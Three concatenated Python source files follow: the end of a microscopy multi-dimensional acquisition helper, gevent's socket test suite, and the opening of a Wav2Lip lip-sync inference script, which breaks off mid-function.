        self.processor_thread = multiprocessing.Process(
            target=other_thread_fn, args=(), name='ImageProcessor') if process \
            else threading.Thread(target=other_thread_fn, args=(), name='ImageProcessor')
        self.processor_thread.start()

        sockets_connected_evt.wait()  # wait for push/pull sockets to connect
        processor.start_push()
def multi_d_acquisition_events(num_time_points=1, time_interval_s=0, z_start=None, z_end=None, z_step=None,
                               channel_group=None, channels=None, channel_exposures_ms=None, xy_positions=None, order='tpcz'):
    """
    Convenience function for generating the events of a typical multi-dimensional acquisition (i.e. an
    acquisition with some combination of multiple timepoints, channels, z-slices, or xy positions)

    :param num_time_points: How many time points if it is a timelapse
    :type num_time_points: int
    :param time_interval_s: the minimum interval between consecutive time points in seconds. Keep at 0 to go as
        fast as possible
    :type time_interval_s: float
    :param z_start: z-stack starting position, in µm
    :type z_start: float
    :param z_end: z-stack ending position, in µm (exclusive, per numpy.arange semantics)
    :type z_end: float
    :param z_step: step size of z-stack, in µm
    :type z_step: float
    :param channel_group: name of the channel group (which should correspond to a config group in micro-manager)
    :type channel_group: str
    :param channels: list of channel names, which correspond to possible settings of the config group (e.g. ['DAPI',
        'FITC'])
    :type channels: list of strings
    :param channel_exposures_ms: list of camera exposure times corresponding to each channel. The length of this list
        should be the same as the length of the list of channels
    :type channel_exposures_ms: list of floats or ints
    :param xy_positions: N by 2 numpy array where N is the number of XY stage positions, and the 2 are the X and Y
        coordinates
    :type xy_positions: numpy array
    :param order: string that specifies the order of different dimensions. Must have some ordering of the letters
        c, t, p, and z. For example, 'tcz' would run a timelapse where z stacks would be acquired at each channel in
        series. 'pt' would move to different xy stage positions and run a complete timelapse at each one before moving
        to the next
    :type order: str

    :return: a list of acquisition events to run the specified acquisition
    """
    def generate_events(event, order):
        # Recursively expand one axis at a time in the requested order; axes whose
        # parameters were not supplied (or a 1-point timelapse) are skipped.
        if len(order) == 0:
            yield event
            return
        elif order[0] == 't' and num_time_points != 1:
            time_indices = np.arange(num_time_points)
            for time_index in time_indices:
                new_event = copy.deepcopy(event)
                new_event['axes']['time'] = time_index
                if time_interval_s != 0:
                    new_event['min_start_time'] = time_index * time_interval_s
                yield from generate_events(new_event, order[1:])
        elif order[0] == 'z' and z_start is not None and z_end is not None and z_step is not None:
            z_positions = np.arange(z_start, z_end, z_step)
            for z_index, z_position in enumerate(z_positions):
                new_event = copy.deepcopy(event)
                new_event['axes']['z'] = z_index
                new_event['z'] = z_position
                yield from generate_events(new_event, order[1:])
        elif order[0] == 'p' and xy_positions is not None:
            for p_index, xy in enumerate(xy_positions):
                new_event = copy.deepcopy(event)
                new_event['axes']['position'] = p_index
                new_event['x'] = xy[0]
                new_event['y'] = xy[1]
                yield from generate_events(new_event, order[1:])
        elif order[0] == 'c' and channel_group is not None and channels is not None:
            for i in range(len(channels)):
                new_event = copy.deepcopy(event)
                new_event['channel'] = {'group': channel_group, 'config': channels[i]}
                if channel_exposures_ms is not None:
                    # BUG FIX: previously stored the loop index i instead of the
                    # actual exposure time for this channel.
                    new_event['exposure'] = channel_exposures_ms[i]
                yield from generate_events(new_event, order[1:])
        else:
            # this axis appears to be missing; recurse into the remaining ones
            yield from generate_events(event, order[1:])

    # 'yield from' flattens the recursion, so the generator yields finished
    # event dicts directly and a simple list() collects them all.
    base_event = {'axes': {}}
    return list(generate_events(base_event, order))
|
test__socket.py
|
# This line can be commented out so that most tests run with the
# system socket for comparison.
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey; monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
from gevent.testing.skipping import skipOnMacOnCI
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class Thread(_Thread):
    """A thread that starts itself on construction and records any unhandled
    exception from its target in ``terminal_exc`` (as ``sys.exc_info()``),
    so the test body can re-raise it after joining."""

    def __init__(self, **kwargs):
        run = kwargs.pop('target')
        self.terminal_exc = None

        @wraps(run)
        def recording_target(*args, **kw):
            try:
                return run(*args, **kw)
            except: # pylint:disable=bare-except
                # Capture for the joining thread, then let it propagate.
                self.terminal_exc = sys.exc_info()
                raise

        _Thread.__init__(self, target=recording_target, **kwargs)
        self.start()
class TestTCP(greentest.TestCase):
    """Exercise TCP socket behavior (gevent's sockets, or the system's when the
    monkey-patch line at the top of the file is commented out)."""

    __timeout__ = None
    TIMEOUT_ERROR = socket.timeout
    long_data = ", ".join([str(x) for x in range(20000)])
    if not isinstance(long_data, bytes):
        long_data = long_data.encode('ascii')

    def setUp(self):
        super(TestTCP, self).setUp()
        # With '-v', install a logging self.log and wrap _close_on_teardown so
        # socket lifetimes can be traced; otherwise self.log is a no-op.
        if '-v' in sys.argv:
            printed = []
            try:
                from time import perf_counter as now
            except ImportError:
                from time import time as now

            def log(*args):
                if not printed:
                    print()
                    printed.append(1)
                print("\t ->", now(), *args)

            orig_cot = self._close_on_teardown

            def cot(o):
                log("Registering for teardown", o)

                def c():
                    log("Closing on teardown", o)
                    o.close()
                orig_cot(c)
                return o
            self._close_on_teardown = cot
        else:
            def log(*_args):
                "Does nothing"

        self.log = log

        self.listener = self._close_on_teardown(self._setup_listener())
        # It is important to watch the lifetimes of socket objects and
        # ensure that:
        # (1) they are closed; and
        # (2) *before* the next test begins.
        #
        # For example, it's a bad bad thing to leave a greenlet running past the
        # scope of the individual test method if that greenlet will close
        # a socket object --- especially if that socket object might also have been
        # closed explicitly.
        #
        # On Windows, we've seen issue with filenos getting reused while something
        # still thinks they have the original fileno around. When they later
        # close that fileno, a completely unrelated object is closed.
        self.port = self.listener.getsockname()[1]

    def _setup_listener(self):
        return tcp_listener()

    def create_connection(self, host=None, port=None, timeout=None,
                          blocking=None):
        """Connect a fresh client socket to the test listener; registered for teardown."""
        sock = self._close_on_teardown(socket.socket())
        sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
        if timeout is not None:
            sock.settimeout(timeout)
        if blocking is not None:
            sock.setblocking(blocking)
        return sock

    def _test_sendall(self, data, match_data=None, client_method='sendall',
                      **client_args):
        """Send *data* with *client_method* and assert the server reads it back intact."""
        # pylint:disable=too-many-locals,too-many-branches,too-many-statements
        log = self.log
        log("Sendall", client_method)

        read_data = []
        accepted_event = Event()

        def accept_and_read():
            log("accepting", self.listener)
            conn, _ = self.listener.accept()
            try:
                with conn.makefile(mode='rb') as r:
                    log("accepted on server", conn)
                    accepted_event.set()
                    log("reading")
                    read_data.append(r.read())
                    log("done reading")
                del r
            finally:
                conn.close()
                del conn

        server = Thread(target=accept_and_read)
        try:
            log("creating client connection")
            client = self.create_connection(**client_args)

            # We seem to have a buffer stuck somewhere on appveyor?
            # https://ci.appveyor.com/project/denik/gevent/builds/27320824/job/bdbax88sqnjoti6i#L712
            should_unwrap = hasattr(client, 'unwrap') and greentest.PY37 and greentest.WIN

            # The implicit reference-based nastiness of Python 2
            # sockets interferes, especially when using SSL sockets.
            # The best way to get a decent FIN to the server is to shutdown
            # the output. Doing that on Python 3, OTOH, is contraindicated
            # except on PyPy.
            should_shutdown = greentest.PY2 or greentest.PYPY

            # It's important to wait for the server to fully accept before
            # we shutdown and close the socket. In SSL mode, the number
            # and timing of data exchanges to complete the handshake and
            # thus exactly when greenlet switches occur, varies by TLS version.
            #
            # It turns out that on < TLS1.3, we were getting lucky and the
            # server was the greenlet that raced ahead and blocked in r.read()
            # before the client returned from create_connection().
            #
            # But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
            # one that raced ahead while the server had yet to return from
            # self.listener.accept(). So the client sent the data to the socket,
            # and closed, before the server could do anything, and the server,
            # when it got switched to by server.join(), found its new socket
            # dead.
            accepted_event.wait()
            log("accepted", client)
            try:
                getattr(client, client_method)(data)
            except:
                import traceback; traceback.print_exc()
                # unwrapping might not work after this because we're in
                # a bad state.
                if should_unwrap:
                    client.shutdown(socket.SHUT_RDWR)
                    should_unwrap = False
                    should_shutdown = False
                raise
            finally:
                log("shutdown")
                if should_shutdown:
                    client.shutdown(socket.SHUT_RDWR)
                elif should_unwrap:
                    try:
                        client.unwrap()
                    except OSError as e:
                        if greentest.PY37 and greentest.WIN and e.errno == 0:
                            # ? 3.7.4 on AppVeyor sometimes raises
                            # "OSError[errno 0] Error" here, which doesn't make
                            # any sense.
                            pass
                        else:
                            raise
                log("closing")
                client.close()
        finally:
            server.join(10)
            assert not server.is_alive()

        if server.terminal_exc:
            reraise(*server.terminal_exc)

        if match_data is None:
            match_data = self.long_data
        read_data = read_data[0].split(b',')
        match_data = match_data.split(b',')
        self.assertEqual(read_data, match_data)

    def test_sendall_str(self):
        self._test_sendall(self.long_data)

    if six.PY2:
        def test_sendall_unicode(self):
            self._test_sendall(six.text_type(self.long_data))

    @skipOnMacOnCI("Sometimes fails for no apparent reason (buffering?)")
    def test_sendall_array(self):
        data = array.array("B", self.long_data)
        self._test_sendall(data)

    def test_sendall_empty(self):
        data = b''
        self._test_sendall(data, data)

    def test_sendall_empty_with_timeout(self):
        # Issue 719
        data = b''
        self._test_sendall(data, data, timeout=10)

    def test_sendall_nonblocking(self):
        # https://github.com/benoitc/gunicorn/issues/1282
        # Even if the socket is non-blocking, we make at least
        # one attempt to send data. Under Py2 before this fix, we
        # would incorrectly immediately raise a timeout error
        data = b'hi\n'
        self._test_sendall(data, data, blocking=False)

    def test_empty_send(self):
        # Issue 719
        data = b''
        self._test_sendall(data, data, client_method='send')

    def test_fullduplex(self):
        N = 100000

        def server():
            remote_client, _ = self.listener.accept()
            self._close_on_teardown(remote_client)
            # start reading, then, while reading, start writing. the reader should not hang forever

            sender = Thread(target=remote_client.sendall,
                            args=((b't' * N),))
            try:
                result = remote_client.recv(1000)
                self.assertEqual(result, b'hello world')
            finally:
                sender.join()

        server_thread = Thread(target=server)
        client = self.create_connection()
        client_file = self._close_on_teardown(client.makefile())
        client_reader = Thread(target=client_file.read, args=(N, ))
        time.sleep(0.1)
        client.sendall(b'hello world')
        time.sleep(0.1)

        # close() used to hang
        client_file.close()
        client.close()

        # this tests "full duplex" bug;
        server_thread.join()
        client_reader.join()

    def test_recv_timeout(self):
        def accept():
            # make sure the conn object stays alive until the end;
            # premature closing triggers a ResourceWarning and
            # EOF on the client.
            conn, _ = self.listener.accept()
            self._close_on_teardown(conn)

        acceptor = Thread(target=accept)
        client = self.create_connection()
        try:
            client.settimeout(1)
            start = time.time()
            with self.assertRaises(self.TIMEOUT_ERROR):
                client.recv(1024)
            took = time.time() - start
            self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
        finally:
            acceptor.join()

    # Subclasses can disable this
    _test_sendall_timeout_check_time = True

    # Travis-CI container infrastructure is configured with
    # large socket buffers, at least 2MB, as-of Jun 3, 2015,
    # so we must be sure to send more data than that.
    # In 2018, this needs to be increased *again* as a smaller value was
    # still often being sent.
    _test_sendall_data = b'hello' * 100000000

    # This doesn't make much sense...why are we really skipping this?
    @greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
    def test_sendall_timeout(self):
        client_sock = []
        acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
        client = self.create_connection()
        time.sleep(0.1)
        assert client_sock
        client.settimeout(0.1)
        start = time.time()
        try:
            with self.assertRaises(self.TIMEOUT_ERROR):
                client.sendall(self._test_sendall_data)
            if self._test_sendall_timeout_check_time:
                took = time.time() - start
                self.assertTimeWithinRange(took, 0.09, 0.2)
        finally:
            acceptor.join()
            client.close()
            client_sock[0][0].close()

    def test_makefile(self):
        def accept_once():
            conn, _ = self.listener.accept()
            fd = conn.makefile(mode='wb')
            fd.write(b'hello\n')
            fd.flush()
            fd.close()
            conn.close()  # for pypy

        acceptor = Thread(target=accept_once)
        try:
            client = self.create_connection()
            # Closing the socket doesn't close the file
            client_file = client.makefile(mode='rb')
            client.close()
            line = client_file.readline()
            self.assertEqual(line, b'hello\n')
            self.assertEqual(client_file.read(), b'')
            client_file.close()
        finally:
            acceptor.join()

    def test_makefile_timeout(self):
        def accept_once():
            conn, _ = self.listener.accept()
            try:
                time.sleep(0.3)
            finally:
                conn.close()  # for pypy

        acceptor = Thread(target=accept_once)
        try:
            client = self.create_connection()
            client.settimeout(0.1)
            fd = client.makefile(mode='rb')
            self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
            client.close()
            fd.close()
        finally:
            acceptor.join()

    def test_attributes(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
        # BUG FIX: family and type were previously asserted against each other
        # swapped (AF_INET vs s.type, SOCK_DGRAM vs s.family); that only passed
        # because AF_INET == SOCK_DGRAM == 2 on common platforms.
        self.assertEqual(socket.AF_INET, s.family)
        self.assertEqual(socket.SOCK_DGRAM, s.type)
        self.assertEqual(0, s.proto)

        if hasattr(socket, 'SOCK_NONBLOCK'):
            s.settimeout(1)
            self.assertEqual(socket.SOCK_DGRAM, s.type)

            s.setblocking(0)
            std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
            try:
                std_socket.setblocking(0)
                self.assertEqual(std_socket.type, s.type)
            finally:
                std_socket.close()

        s.close()

    def test_connect_ex_nonblocking_bad_connection(self):
        # Issue 841
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.setblocking(False)
            ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
            self.assertIsInstance(ret, errno_types)
        finally:
            s.close()

    @skipWithoutExternalNetwork("Tries to resolve hostname")
    def test_connect_ex_gaierror(self):
        # Issue 841
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            with self.assertRaises(socket.gaierror):
                s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
        finally:
            s.close()

    def test_connect_ex_nonblocking_overflow(self):
        # Issue 841
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.setblocking(False)
            with self.assertRaises(OverflowError):
                s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
        finally:
            s.close()

    @unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
                         "Requires SOCK_CLOEXEC")
    def test_connect_with_type_flags_ignored(self):
        # Issue 944
        # If we have SOCK_CLOEXEC or similar, we shouldn't be passing
        # them through to the getaddrinfo call that connect() makes
        SOCK_CLOEXEC = socket.SOCK_CLOEXEC  # pylint:disable=no-member
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)

        def accept_once():
            conn, _ = self.listener.accept()
            fd = conn.makefile(mode='wb')
            fd.write(b'hello\n')
            fd.close()
            conn.close()

        acceptor = Thread(target=accept_once)
        try:
            s.connect((params.DEFAULT_CONNECT, self.port))
            fd = s.makefile(mode='rb')
            self.assertEqual(fd.readline(), b'hello\n')

            fd.close()
            s.close()
        finally:
            acceptor.join()
class TestCreateConnection(greentest.TestCase):
    """Tests for ``socket.create_connection`` (gevent's version, via monkey-patching)."""

    __timeout__ = LARGE_TIMEOUT

    def test_refuses(self, **conn_args):
        # Connecting to an unused local port must raise socket.error; the
        # acceptable message varies widely by platform (see comment below).
        connect_port = support.find_unused_port()
        with self.assertRaisesRegex(
                socket.error,
                # We really expect "connection refused". It's unclear
                # where/why we would get '[errno -2] name or service
                # not known' but it seems some systems generate that.
                # https://github.com/gevent/gevent/issues/1389 Somehow
                # extremly rarely we've also seen 'address already in
                # use', which makes even less sense. The manylinux
                # 2010 environment produces 'errno 99 Cannot assign
                # requested address', which, I guess?
                'refused|not known|already in use|assign'
        ):
            socket.create_connection(
                (greentest.DEFAULT_BIND_ADDR, connect_port),
                timeout=30,
                **conn_args
            )

    def test_refuses_from_port(self):
        # Same as test_refuses, but binding the client to an explicit source port.
        source_port = support.find_unused_port()
        # Usually we don't want to bind/connect to '', but
        # using it as the source is required if we don't want to hang,
        # at least on some systems (OS X)
        self.test_refuses(source_address=('', source_port))

    @greentest.ignores_leakcheck
    @skipWithoutExternalNetwork("Tries to resolve hostname")
    def test_base_exception(self):
        # such as a GreenletExit or a gevent.timeout.Timeout
        # create_connection() must close the partially-created socket even when
        # connect() raises a BaseException that is not an Exception.

        class E(BaseException):
            pass

        class MockSocket(object):
            # created: class-level tuple recording every instance constructed,
            # so the test can assert exactly one socket was made and closed.
            created = ()
            closed = False

            def __init__(self, *_):
                MockSocket.created += (self,)

            def connect(self, _):
                # Simulate a BaseException escaping mid-connect.
                raise E(_)

            def close(self):
                self.closed = True

        def mockgetaddrinfo(*_):
            # Single fake addrinfo tuple: (family, type, proto, canonname, sockaddr).
            return [(1, 2, 3, 3, 5),]

        import gevent.socket as gsocket
        # Make sure we're monkey patched
        self.assertEqual(gsocket.create_connection, socket.create_connection)
        orig_socket = gsocket.socket
        orig_getaddrinfo = gsocket.getaddrinfo

        try:
            # Swap in the mocks so create_connection uses them internally.
            gsocket.socket = MockSocket
            gsocket.getaddrinfo = mockgetaddrinfo

            with self.assertRaises(E):
                socket.create_connection(('host', 'port'))

            self.assertEqual(1, len(MockSocket.created))
            self.assertTrue(MockSocket.created[0].closed)

        finally:
            # Always restore the real implementations for later tests.
            MockSocket.created = ()
            gsocket.socket = orig_socket
            gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
    """Tests for module-level functions of gevent.socket."""

    @greentest.ignores_leakcheck
    # Creating new types in the function takes a cycle to cleanup.
    def test_wait_timeout(self):
        # Issue #635
        import gevent.socket
        import gevent._socketcommon

        class io(object):
            # Minimal stand-in for a watcher object: start() just blocks far
            # longer than the wait timeout, forcing the timeout path.
            callback = None

            def start(self, *_args):
                gevent.sleep(10)

        with self.assertRaises(gevent.socket.timeout):
            gevent.socket.wait(io(), timeout=0.01) # pylint:disable=no-member

    def test_signatures(self):
        # https://github.com/gevent/gevent/issues/960
        # gevent's replacements must expose the same signatures as the stdlib.
        exclude = []
        if greentest.PYPY:
            # Up through at least PyPy 5.7.1, they define these as
            # gethostbyname(host), whereas the official CPython argument name
            # is hostname. But cpython doesn't allow calling with keyword args.
            # Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
            exclude.append('gethostbyname')
            exclude.append('gethostbyname_ex')
            exclude.append('gethostbyaddr')
        self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
    """Miscellaneous socket-object regression tests."""

    def test_shutdown_when_closed(self):
        # https://github.com/gevent/gevent/issues/1089
        # Calling shutdown() on an already-closed socket must raise
        # socket.error, not the AttributeError it once did.
        sock = socket.socket()
        sock.close()
        with self.assertRaises(socket.error):
            sock.shutdown(socket.SHUT_RDWR)
# Allow running this module directly: greentest.main() discovers and runs
# every TestCase defined above under gevent's test runner.
if __name__ == '__main__':
    greentest.main()
|
inference_webstreaming.py
|
import numpy as np
import scipy, cv2, os, sys, argparse, audio
import json, subprocess, random, string
from tqdm import tqdm
from glob import glob
import torch, face_detection
from models import Wav2Lip
import platform
# from flask import Response, Flask, render_template
import threading
import subprocess
import zipfile
import os
import argparse
import ffmpeg
import datetime
import time
import cv2
import wave
import logging
sys.path.insert(1, 'util')
from ffmpeg_stream import *
# Command-line interface and global configuration for Wav2Lip lip-sync inference.
parser = argparse.ArgumentParser(description='Inference code to lip-sync videos in the wild using Wav2Lip models')

parser.add_argument('--checkpoint_path', type=str,
                    help='Name of saved checkpoint to load weights from', required=True)

parser.add_argument('--face', type=str,
                    help='Filepath of video/image that contains faces to use', required=True)
parser.add_argument('--audio', type=str,
                    help='Filepath of video/audio file to use as raw audio source', required=True)
# parser.add_argument('--outfile', type=str, help='Video path to save result. See default for an e.g.',
#                     default='results/result_voice.mp4')

parser.add_argument('--static', type=bool,
                    help='If True, then use only first video frame for inference', default=False)
parser.add_argument('--fps', type=float, help='Can be specified only if input is a static image (default: 25)',
                    default=25., required=False)

parser.add_argument('--pads', nargs='+', type=int, default=[0, 10, 0, 0],
                    help='Padding (top, bottom, left, right). Please adjust to include chin at least')

parser.add_argument('--face_det_batch_size', type=int,
                    help='Batch size for face detection', default=16)
parser.add_argument('--wav2lip_batch_size', type=int, help='Batch size for Wav2Lip model(s)', default=128)

parser.add_argument('--resize_factor', default=1, type=int,
                    help='Reduce the resolution by this factor. Sometimes, best results are obtained at 480p or 720p')

parser.add_argument('--crop', nargs='+', type=int, default=[0, -1, 0, -1],
                    help='Crop video to a smaller region (top, bottom, left, right). Applied after resize_factor and rotate arg. '
                         'Useful if multiple face present. -1 implies the value will be auto-inferred based on height, width')

parser.add_argument('--box', nargs='+', type=int, default=[-1, -1, -1, -1],
                    help='Specify a constant bounding box for the face. Use only as a last resort if the face is not detected.'
                         'Also, might work only if the face is not moving around much. Syntax: (top, bottom, left, right).')

parser.add_argument('--rotate', default=False, action='store_true',
                    help='Sometimes videos taken from a phone can be flipped 90deg. If true, will flip video right by 90deg.'
                         'Use if you get a flipped result, despite feeding a normal looking video')

parser.add_argument('--nosmooth', default=False, action='store_true',
                    help='Prevent smoothing face detections over a short temporal window')

# IP and Port for Video Streaming
parser.add_argument("-i", "--ip", type=str, default="0.0.0.0", #172.24.92.25
                    help="ip address of the device")
parser.add_argument("-o", "--port", type=int, default=8080,
                    help="ephemeral port number of the server (1024 to 65535)")

args = parser.parse_args()
# Fixed model input size and audio sample rate expected by the Wav2Lip network.
args.img_size = 96
args.audio_sr = 16000

logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)

# Treat a still-image input as "static" (only the first frame is used).
# BUG FIX: use the *last* dot-separated token (the actual extension, case
# insensitive) rather than split('.')[1], which returns the wrong token for
# any path containing extra dots (e.g. '../face.jpg' -> '', 'a.v2.png' -> 'v2').
if os.path.isfile(args.face) and args.face.split('.')[-1].lower() in ['jpg', 'png', 'jpeg']:
    args.static = True
def get_smoothened_boxes(boxes, T):
    """Temporally smooth face boxes in place.

    Each row of *boxes* is replaced by the mean of a window of T rows starting
    at that row (the final rows reuse the last T rows so the window never runs
    off the end). Smoothing is progressive: earlier rows are already smoothed
    when later windows that wrap to the tail are averaged. Returns *boxes*.
    """
    count = len(boxes)
    for idx in range(count):
        window = boxes[count - T:] if idx + T > count else boxes[idx: idx + T]
        boxes[idx] = np.mean(window, axis=0)
    return boxes
def face_detect(images):
    """Detect one face bounding box per frame.

    Runs the face_detection model over *images* in batches, shrinking the
    batch size on GPU OOM, then pads each detection by args.pads and
    optionally smooths the boxes over time.

    Returns a list of [cropped_face, (y1, y2, x1, x2)] pairs, one per frame.
    Raises ValueError if any frame has no detectable face.
    """
    # NOTE(review): 'device' is a module-level global set elsewhere in the
    # file — presumably 'cuda' or 'cpu'; confirm before reuse.
    detector = face_detection.FaceAlignment(face_detection.LandmarksType._2D,
                                            flip_input=False, device=device)

    batch_size = args.face_det_batch_size

    # Retry loop: on GPU OOM, halve the batch size and start over until it
    # fits (or fail outright at batch_size == 1).
    while 1:
        predictions = []
        try:
            for i in range(0, len(images), batch_size):
                predictions.extend(detector.get_detections_for_batch(np.array(images[i:i + batch_size])))
        except RuntimeError:
            if batch_size == 1:
                raise RuntimeError(
                    'Image too big to run face detection on GPU. Please use the --resize_factor argument')
            batch_size //= 2
            print('Recovering from OOM error; New batch size: {}'.format(batch_size))
            continue
        break

    results = []
    pady1, pady2, padx1, padx2 = args.pads
    for rect, image in zip(predictions, images):
        if rect is None:
            cv2.imwrite('temp/faulty_frame.jpg', image)  # check this frame where the face was not detected.
            raise ValueError('Face not detected! Ensure the video contains a face in all the frames.')

        # Pad the raw detection, clamped to the image bounds.
        y1 = max(0, rect[1] - pady1)
        y2 = min(image.shape[0], rect[3] + pady2)
        x1 = max(0, rect[0] - padx1)
        x2 = min(image.shape[1], rect[2] + padx2)

        results.append([x1, y1, x2, y2])

    boxes = np.array(results)
    # Smooth jittery detections across a 5-frame window unless disabled.
    if not args.nosmooth: boxes = get_smoothened_boxes(boxes, T=5)
    results = [[image[y1: y2, x1:x2], (y1, y2, x1, x2)] for image, (x1, y1, x2, y2) in zip(images, boxes)]

    # Free the detector (and its GPU memory) before returning.
    del detector
    return results
def face_detect_wrapper(frames):
    """Return per-frame [face_crop, (y1, y2, x1, x2)] pairs for `frames`.

    When args.box is left at its sentinel (-1), real face detection is run --
    on every frame, or only the first frame in static mode. Otherwise the
    user-supplied fixed bounding box is applied to all frames.
    """
    if args.box[0] == -1:
        if not args.static:
            face_det_results = face_detect(frames)  # BGR2RGB for CNN face detection
        else:
            # Static input: a single detection suffices, reused for all output.
            face_det_results = face_detect([frames[0]])
    else:
        print('Using the specified bounding box instead of face detection...')
        y1, y2, x1, x2 = args.box
        face_det_results = [[f[y1: y2, x1:x2], (y1, y2, x1, x2)] for f in frames]
    return face_det_results
def datagen(frames, face_det_results, mels, start_frame_idx):
    """Yield model-ready batches (img_batch, mel_batch, frame_batch, coords_batch).

    Source frames are taken starting at `start_frame_idx` (modulo the video
    length), wrapping around when the audio outlasts the video. Each image in
    img_batch is the face crop concatenated channel-wise with a copy whose
    lower half is zeroed out.

    Args:
        frames: full BGR frames of the input video.
        face_det_results: per-frame [face_crop, (y1, y2, x1, x2)], aligned
            1:1 with `frames`.
        mels: mel-spectrogram chunks, one per output frame.
        start_frame_idx: current position in the output video.
    """
    # start frame idx is the current frame idx in the output video
    # we start from this point
    img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
    start_frame_idx = start_frame_idx % len(frames)  # loop back
    num_frames = len(mels)
    # take frames from start_frame_idx to start_frame_idx+num_frames
    # wrapping around if necessary
    if not args.static:
        if len(frames) == 1:
            frames_current = frames
            face_det_results_current = face_det_results
        # NOTE(review): the assignments just above are unconditionally
        # overwritten by the if/else below (missing elif?). Harmless in
        # practice: with one frame both paths yield only that frame -- confirm.
        if start_frame_idx + num_frames > len(frames):
            frames_current = frames[start_frame_idx:] + frames[:start_frame_idx + num_frames - len(frames)]
            face_det_results_current = face_det_results[start_frame_idx:] + face_det_results[:start_frame_idx + num_frames - len(frames)]
        else:
            frames_current = frames[start_frame_idx:start_frame_idx + num_frames]
            face_det_results_current = face_det_results[start_frame_idx:start_frame_idx + num_frames]
    else:
        frames_current = frames
        face_det_results_current = face_det_results
    for i, m in enumerate(mels):
        idx = 0 if args.static else i % len(frames_current)
        frame_to_save = frames_current[idx].copy()
        face, coords = face_det_results_current[idx].copy()
        face = cv2.resize(face, (args.img_size, args.img_size))
        img_batch.append(face)
        mel_batch.append(m)
        frame_batch.append(frame_to_save)
        coords_batch.append(coords)
        if len(img_batch) >= args.wav2lip_batch_size:
            img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
            # Zero the lower half (rows img_size//2 and below) of the masked
            # copy, then stack masked+original along the channel axis.
            img_masked = img_batch.copy()
            img_masked[:, args.img_size // 2:] = 0
            img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
            mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
            yield img_batch, mel_batch, frame_batch, coords_batch
            img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
    if len(img_batch) > 0:
        # Flush the final partial batch.
        img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
        img_masked = img_batch.copy()
        img_masked[:, args.img_size // 2:] = 0
        img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
        mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
        yield img_batch, mel_batch, frame_batch, coords_batch
# mel_step_size: size of each mel_chunk (except last one which can be shorter)
# can't be made very small due to neural network architecture (should be > roughly 3)
mel_step_size = 16
# Run inference on GPU when one is available, otherwise fall back to CPU.
device = 'cuda' if torch.cuda.is_available() else 'cpu'
print('Using {} for inference.'.format(device))
def _load(checkpoint_path):
    """Load a torch checkpoint, remapping CUDA storages to CPU when no GPU
    is in use (i.e. the module-level `device` is not 'cuda')."""
    if device == 'cuda':
        return torch.load(checkpoint_path)
    # CPU-only: map every storage onto the CPU so GPU-saved files still load.
    return torch.load(checkpoint_path,
                      map_location=lambda storage, loc: storage)
def load_model(path):
    """Construct a Wav2Lip model, load weights from `path`, move it to the
    active device, and return it in eval mode."""
    model = Wav2Lip()
    print("Load checkpoint from: {}".format(path))
    checkpoint = _load(path)
    # Checkpoints saved under DataParallel prefix every key with 'module.';
    # strip that prefix so the keys match a bare Wav2Lip instance.
    cleaned_state = {key.replace('module.', ''): value
                     for key, value in checkpoint["state_dict"].items()}
    model.load_state_dict(cleaned_state)
    return model.to(device).eval()
##### For streaming #####
def preprocess_video():
    """Read all frames from args.face (a video file or a single still image).

    Applies the optional resize, rotation, and crop from the CLI args to every
    frame.

    Returns:
        list of BGR frames (numpy arrays).
    Raises:
        ValueError: if args.face does not point at an existing file.
    """
    if not os.path.isfile(args.face):
        raise ValueError('--face argument must be a valid path to video/image file')
    # Bug fix: the original checked args.face.split('.')[1], which looks at the
    # text after the FIRST dot and misclassifies paths such as 'my.take2.mp4'
    # or '/a.b/video.mp4'. os.path.splitext yields the real extension; lower()
    # additionally accepts upper-case extensions like '.JPG'.
    elif os.path.splitext(args.face)[1].lower() in ['.jpg', '.png', '.jpeg']:
        full_frames = [cv2.imread(args.face)]
        fps = args.fps
    else:
        video_stream = cv2.VideoCapture(args.face)
        fps = video_stream.get(cv2.CAP_PROP_FPS)
        print('Reading video frames...')
        full_frames = []
        while 1:
            still_reading, frame = video_stream.read()
            if not still_reading:
                video_stream.release()
                break
            if args.resize_factor > 1:
                frame = cv2.resize(frame, (frame.shape[1] // args.resize_factor, frame.shape[0] // args.resize_factor))
            if args.rotate:
